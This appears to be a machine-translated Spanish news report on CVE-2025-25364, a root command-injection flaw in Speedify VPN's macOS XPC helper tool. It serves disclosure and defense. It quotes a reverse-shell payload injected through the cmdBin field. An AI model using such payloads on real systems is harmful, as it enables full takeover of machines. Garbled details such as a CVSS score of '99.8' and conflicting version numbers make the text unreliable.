Se descubrió una vulnerabilidad de seguridad crítica que rastreaba como CVE-2025-25364 para acelerar la aplicación MacOS de la VPN, exponiendo a los usuarios a la escalada de privilegios locales y un compromiso de sistema completo.
El defecto revelado por Securelayer7 existe en la herramienta de ayuda privilegiada me.connectify.smjobblesshelper.
La vulnerabilidad se debe a la validación de entrada incorrecta de la interfaz XPC (comunicación de procesos cruzados) de la herramienta Helper.
Específicamente, se usaron dos campos de control de usuario (CMDPATH y CMDBIN) directamente para construir cadenas de línea de comandos sin la desinfección adecuada al ingresar mensajes XPC.
Este monitoreo permite una vulnerabilidad de inyección de comandos, lo que permite a los atacantes locales crear mensajes XPC maliciosos e inyectar cualquier comando de shell que se ejecute como root.
La cadena de ataque incluía varias características.
xpc_connection_handler_block_invoke: el punto de entrada para el mensaje XPC. Verifiqué el mensaje de tipo de diccionario y llamé _handlelaunchSpeedifyMsg si el campo “Solicitar” es “RunSpeedify”. No se realizó verificación en el contenido del CMDPath o CMDBin.
_HandlelaunchSpeedifyMsg: Obtuve cmdpath y cmdbin del diccionario XPC y lo pasé a la siguiente función.
_runSystemCMD: construye y ejecuta cadenas de comandos usando asprintf, incrustando directamente cmdpath y cmdbin respaldados por el usuario. Las líneas clave son:
Esta cadena de comando se ejecutó luego usando System (), lo que facilita que un atacante inyecte comandos de shell adicionales.
Los factores de riesgo se vieron afectados por el producto VPNIFY Speedify, que utiliza la VPN de MacOS (hasta la versión 15.0.0). root.exploit PrerereRequisitesLocal Ejecute cualquier comando como acceso. Función para enviar mensajes XPC diseñados a Helper Tool CVSS 3.1 Puntuación 99.8 (crítico)
Exploit de prueba de concepto
La explotación de prueba de concepto (POC) demostró el problema enviando un mensaje XPC diseñado a un servicio vulnerable.
Estableciendo cmdbin en una carga útil como “; bash -i> &/dev/tcp/127.0.0.1/1339 0> & 1; echo” Un atacante podría generar un shell inverso con privilegios raíz.
El código de exploit escrito en Objective-C se conectó al servicio me.connectify.smjobblesshelper XPC, que ofrece cargas útiles maliciosas, lo que resulta en un acceso inmediato a nivel raíz.
La herramienta Helper se ejecutó como un demonio a nivel de raíz (/Library/privilegedHelperTools/me.connectify.smjobblesshelper), lo que significa que el atacante habilita la explotación.
Leer, modificar o eliminar archivos del sistema confidenciales. Instale malware o puertas traseras permanentes. Control total sobre los dispositivos MacOS afectados.
Por lo tanto, esta vulnerabilidad plantea un riesgo significativo para los sistemas que ejecutan una versión vulnerable de Speedify VPN (antes del 15.4.1).
Speedify VPN abordó una vulnerabilidad en la versión 15.4.1. Esto incluye una reescritura completa de las herramientas auxiliares.
La nueva versión elimina el procesamiento inseguro de XPC, implementa la validación de entrada apropiada y cierra el vector de inyección de comando.
Se insta a los usuarios a actualizar la última versión para reducir el riesgo de explotación.
Informe de tendencia de malware 15,000 incidentes del equipo SOC, trimestre de 2025! -> Obtenga una copia gratis